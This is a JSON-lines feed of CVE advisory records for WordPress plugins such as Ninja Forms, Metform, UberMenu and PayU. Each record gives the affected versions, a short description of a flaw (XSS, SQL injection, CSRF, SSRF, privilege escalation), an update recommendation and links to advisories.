{"CVE_ID":"CVE-2025-1524","slug":"ultimate-dashboard","versionImpact":"3.8.5","versionEndExcluding":"3.8.6","description":"The Ultimate Dashboard WordPress plugin before 3.8.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36aed1e4-05cb-42d2-b835-f6336f1a82cd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36aed1e4-05cb-42d2-b835-f6336f1a82cd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1523","slug":"ultimate-dashboard","versionImpact":"3.8.5","versionEndExcluding":"3.8.6","description":"The Ultimate Dashboard WordPress plugin before 3.8.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a20768f-3128-4b0a-a06b-2247f3e02c99\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a20768f-3128-4b0a-a06b-2247f3e02c99\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13818","slug":"pie-register","versionImpact":"3.8.4","versionEndExcluding":"3.8.4.1","description":"The Registration Forms \u2013 User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.8.3.9 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information about users contained in the exposed log files.","recommendation":"Update to version 3.8.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/trunk\\\/classes\\\/base_variables.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/trunk\\\/classes\\\/base_variables.php#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/768730c1-a70e-432d-a234-4ce2b8aec424?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/768730c1-a70e-432d-a234-4ce2b8aec424?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1585","slug":"metform","versionImpact":"3.8.3","versionEndExcluding":"3.8.4","description":"The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/342d6941-6987-4756-b554-1699128b9108?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/342d6941-6987-4756-b554-1699128b9108?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/utils\\\/util.php#L555\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/utils\\\/util.php#L555\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/metform\\\/tags\\\/3.8.3&old=3047398&new_path=\\\/metform\\\/tags\\\/3.8.4&new=3047398&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/metform\\\/tags\\\/3.8.3&old=3047398&new_path=\\\/metform\\\/tags\\\/3.8.4&new=3047398&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3593","slug":"ubermenu","versionImpact":"3.8.3","versionEndExcluding":"3.8.4","description":"The UberMenu plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.8.3. This is due to missing or incorrect nonce validation on the ubermenu_delete_all_item_settings and ubermenu_reset_settings functions. This makes it possible for unauthenticated attackers to delete and reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/621ef583-bf99-4b81-ae9c-b4f1c86b86aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/621ef583-bf99-4b81-ae9c-b4f1c86b86aa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ubermenu-wordpress-mega-menu-plugin\\\/154703\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ubermenu-wordpress-mega-menu-plugin\\\/154703\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12264","slug":"payu-india","versionImpact":"3.8.3","versionEndExcluding":"3.8.4","description":"The PayU CommercePro Plugin plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.8.3. This is due to the \/wp-json\/payu\/v1\/generate-user-token and \/wp-json\/payu\/v1\/get-shipping-cost REST API endpoints not properly verifying a user's identity prior to setting the user ID and auth cookies. This makes it possible for unauthenticated attackers to create new administrative user accounts.","recommendation":"Update to version 3.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payu-india\\\/tags\\\/3.8.3\\\/includes\\\/class-payu-shipping-tax-api-calculation.php#L187\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payu-india\\\/tags\\\/3.8.3\\\/includes\\\/class-payu-shipping-tax-api-calculation.php#L187\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf037e4a-2dd7-4296-b86b-635901d2d68f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf037e4a-2dd7-4296-b86b-635901d2d68f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12878","slug":"lazy-blocks","versionImpact":"3.8.2","versionEndExcluding":"3.8.3","description":"The Custom Block Builder WordPress plugin before 3.8.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 3.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/827444d1-87cb-4057-827a-d802eac82cf8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/827444d1-87cb-4057-827a-d802eac82cf8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12031","slug":"advanced-floating-content","versionImpact":"3.8.2","versionEndExcluding":"3.8.3","description":"The Advanced Floating Content plugin for WordPress is vulnerable to SQL Injection via the 'floating_content_duplicate_post' function in all versions up to, and including, 3.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/advanced-floating-content\\\/9945856\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/advanced-floating-content\\\/9945856\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/927076bc-bafa-43d6-bf3b-5861844c932a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/927076bc-bafa-43d6-bf3b-5861844c932a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5949","slug":"smartcrawl-seo","versionEndExcluding":"3.8.3","description":"The SmartCrawl WordPress plugin before 3.8.3 does not prevent unauthorised users from accessing password-protected posts' content.","recommendation":"Update to version 3.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cec27ca-f470-402d-ae3e-271cb59cf407\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cec27ca-f470-402d-ae3e-271cb59cf407\",\"refsource\":\"\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-4710","slug":"ubermenu","versionImpact":"3.8.2","versionEndExcluding":"3.8.3","description":"The UberMenu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ubermenu-col, ubermenu_mobile_close_button, ubermenu_toggle, ubermenu-search shortcodes in all versions up to, and including, 3.8.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96161594-9513-49f7-91ab-9ad05b900a81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96161594-9513-49f7-91ab-9ad05b900a81?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ubermenu-wordpress-mega-menu-plugin\\\/154703\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ubermenu-wordpress-mega-menu-plugin\\\/154703\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2079","slug":"addons-for-visual-composer","versionImpact":"3.8.1","versionEndExcluding":"3.8.3","description":"The WPBakery Page Builder Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'per_line_mobile' shortcode in all versions up to, and including, 3.8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c07b5c8-7fae-499d-9f6c-9392166f74b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c07b5c8-7fae-499d-9f6c-9392166f74b8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3048239%40addons-for-visual-composer&new=3048239%40addons-for-visual-composer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3048239%40addons-for-visual-composer&new=3048239%40addons-for-visual-composer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13470","slug":"ninja-forms","versionImpact":"3.8.24","versionEndExcluding":"3.8.25","description":"The Ninja Forms \u2013 The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode in all versions up to, and including, 3.8.24 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.8.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.23\\\/includes\\\/Display\\\/Render.php#L708\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.23\\\/includes\\\/Display\\\/Render.php#L708\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.23\\\/includes\\\/Display\\\/Shortcodes.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.23\\\/includes\\\/Display\\\/Shortcodes.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.23\\\/ninja-forms.php#L953\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.23\\\/ninja-forms.php#L953\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3229932%40ninja-forms%2Ftrunk&old=3226451%40ninja-forms%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3229932%40ninja-forms%2Ftrunk&old=3226451%40ninja-forms%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f2b46a9-d228-43b4-84af-d56218076087?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f2b46a9-d228-43b4-84af-d56218076087?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12238","slug":"ninja-forms","versionImpact":"3.8.22","versionEndExcluding":"3.8.23","description":"The Ninja Forms \u2013 The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.8.22. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 3.8.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.20\\\/includes\\\/Display\\\/Preview.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.20\\\/includes\\\/Display\\\/Preview.php#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/524a2143-b15f-4edc-98de-dafef4c5bc00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/524a2143-b15f-4edc-98de-dafef4c5bc00?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11052","slug":"ninja-forms","versionImpact":"3.8.19","versionEndExcluding":"3.8.20","description":"The Ninja Forms \u2013 The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the calculations parameter in all versions up to, and including, 3.8.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.8.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.18\\\/includes\\\/Admin\\\/Metaboxes\\\/Calculations.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.18\\\/includes\\\/Admin\\\/Metaboxes\\\/Calculations.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3adf367-0126-4d95-b337-cc3581975113?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3adf367-0126-4d95-b337-cc3581975113?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0552","slug":"pie-register","versionEndExcluding":"3.8.2.3","description":"The Registration Forms WordPress plugin before 3.8.2.3 does not properly validate the redirection URL when logging in and logging out, leading to an Open Redirect vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/832c6155-a413-4641-849c-b98ba55e8551\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/832c6155-a413-4641-849c-b98ba55e8551\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6788","slug":"metform","versionImpact":"3.8.1","versionEndExcluding":"3.8.2","description":"The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.8.1. This is due to missing or incorrect nonce validation on the contents function. This makes it possible for unauthenticated attackers to update the options \"mf_hubsopt_token\", \"mf_hubsopt_refresh_token\", \"mf_hubsopt_token_type\", and \"mf_hubsopt_expires_in\" via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This would allow an attacker to connect their own Hubspot account to a victim site's metform to obtain leads and contacts.","recommendation":"Update to version 3.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30fd2425-ee48-4777-91c1-03906d63793a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30fd2425-ee48-4777-91c1-03906d63793a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/core\\\/integrations\\\/crm\\\/hubspot\\\/loader.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/core\\\/integrations\\\/crm\\\/hubspot\\\/loader.php#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3011284\\\/metform\\\/trunk\\\/core\\\/integrations\\\/crm\\\/hubspot\\\/loader.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3011284\\\/metform\\\/trunk\\\/core\\\/integrations\\\/crm\\\/hubspot\\\/loader.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8757","slug":"wp-post-author","versionImpact":"3.8.1","versionEndExcluding":"3.8.2","description":"The WP Post Author \u2013 Boost Your Blog's Engagement with Author Box, Social Links, Co-Authors, Guest Authors, Post Rating System, and Custom User Registration Form Builder plugin for WordPress is vulnerable to time-based SQL Injection via the linked_user_id parameter in all versions up to, and including, 3.8.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d667bafc-5f19-4889-a988-236df050c013?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d667bafc-5f19-4889-a988-236df050c013?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/GumGumZz\\\/wordpress\\\/blob\\\/main\\\/wp-post-author.md\",\"name\":\"https:\\\/\\\/github.com\\\/GumGumZz\\\/wordpress\\\/blob\\\/main\\\/wp-post-author.md\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-post-author\\\/trunk\\\/includes\\\/multi-authors\\\/wpa-multi-authors.php#L182\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-post-author\\\/trunk\\\/includes\\\/multi-authors\\\/wpa-multi-authors.php#L182\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166002\\\/wp-post-author\\\/trunk\\\/includes\\\/multi-authors\\\/wpa-multi-authors.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166002\\\/wp-post-author\\\/trunk\\\/includes\\\/multi-authors\\\/wpa-multi-authors.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3866","slug":"ninja-forms","versionImpact":"3.8.15","versionEndExcluding":"3.8.16","description":"The Ninja Forms Contact Form plugin for WordPress is vulnerable to Reflected Self-Based Cross-Site Scripting via the 'Referer' header in all versions up to, and including, 3.8.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Successful exploitation of this vulnerability requires \"maintenance mode\" for a targeted form to be enabled. However, there is no setting available to the attacker or even an administrator-level user to enable this mode. The mode is only enabled during a required update, which is a very short window of time. Additionally, because of the self-based nature of this vulnerability, attackers would have to rely on additional techniques to execute a supplied payload in the context of the targeted user.","recommendation":"Update to version 3.8.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6d6b82d-574d-4a56-9aef-42343c4b7c43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6d6b82d-574d-4a56-9aef-42343c4b7c43?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153292\\\/ninja-forms\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153292\\\/ninja-forms\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7354","slug":"ninja-forms","versionImpact":"3.8.10","versionEndExcluding":"3.8.11","description":"The Ninja Forms WordPress plugin before 3.8.11 does not escape a URL before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 3.8.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c871dcd-51d7-4d3b-b036-efa9e066ff41\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c871dcd-51d7-4d3b-b036-efa9e066ff41\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3047","slug":"woocommerce-pdf-invoices-packing-slips","versionImpact":"3.8.0","versionEndExcluding":"3.8.1","description":"The PDF Invoices & Packing Slips for WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 3.8.0 via the transform() function. This can allow unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 3.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18f16148-b4a8-4f89-af0d-c0baba8f9ccf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18f16148-b4a8-4f89-af0d-c0baba8f9ccf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076105\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076105\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3045","slug":"woocommerce-pdf-invoices-packing-slips","versionImpact":"3.8.0","versionEndExcluding":"3.8.1","description":"The PDF Invoices & Packing Slips for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in versions up to, and including, 3.8.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d0e5d24-5d65-4ed5-8086-347969cbd3ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d0e5d24-5d65-4ed5-8086-347969cbd3ec?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-pdf-invoices-packing-slips\\\/trunk\\\/ubl\\\/Transformers\\\/AddressTransformer.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-pdf-invoices-packing-slips\\\/trunk\\\/ubl\\\/Transformers\\\/AddressTransformer.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076105\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076105\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3213","slug":"wp-mail-smtp-pro","versionImpact":"3.8.0","versionEndExcluding":"3.8.1","description":"The WP Mail SMTP Pro plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the is_print_page function in versions up to, and including, 3.8.0. This makes it possible for unauthenticated attackers to disclose potentially sensitive email information.","recommendation":"Update to version 3.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a813251b-a4c1-4b23-ad03-dcc1f4f19eb9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a813251b-a4c1-4b23-ad03-dcc1f4f19eb9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpmailsmtp.com\\\/docs\\\/how-to-view-recent-changes-to-the-wp-mail-smtp-plugin-changelog\\\/\",\"name\":\"https:\\\/\\\/wpmailsmtp.com\\\/docs\\\/how-to-view-recent-changes-to-the-wp-mail-smtp-plugin-changelog\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9384","slug":"wholesale-pricing-woocommerce","versionImpact":"3.8.0","versionEndExcluding":"3.8.1","description":"The Quantity Dynamic Pricing & Bulk Discounts for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.8.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e84ee2b5-96b5-427c-ac66-7f80418ae02f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e84ee2b5-96b5-427c-ac66-7f80418ae02f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wholesale-pricing-woocommerce\\\/tags\\\/3.8.0\\\/includes\\\/settings\\\/class-alg-wc-wholesale-pricing-settings-per-product.php#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wholesale-pricing-woocommerce\\\/tags\\\/3.8.0\\\/includes\\\/settings\\\/class-alg-wc-wholesale-pricing-settings-per-product.php#L126\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161269\\\/wholesale-pricing-woocommerce\\\/tags\\\/3.8.1\\\/includes\\\/settings\\\/class-alg-wc-wholesale-pricing-settings-per-product.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161269\\\/wholesale-pricing-woocommerce\\\/tags\\\/3.8.1\\\/includes\\\/settings\\\/class-alg-wc-wholesale-pricing-settings-per-product.php\",\"refsource\":\"\",\"tags\":[]}]"}
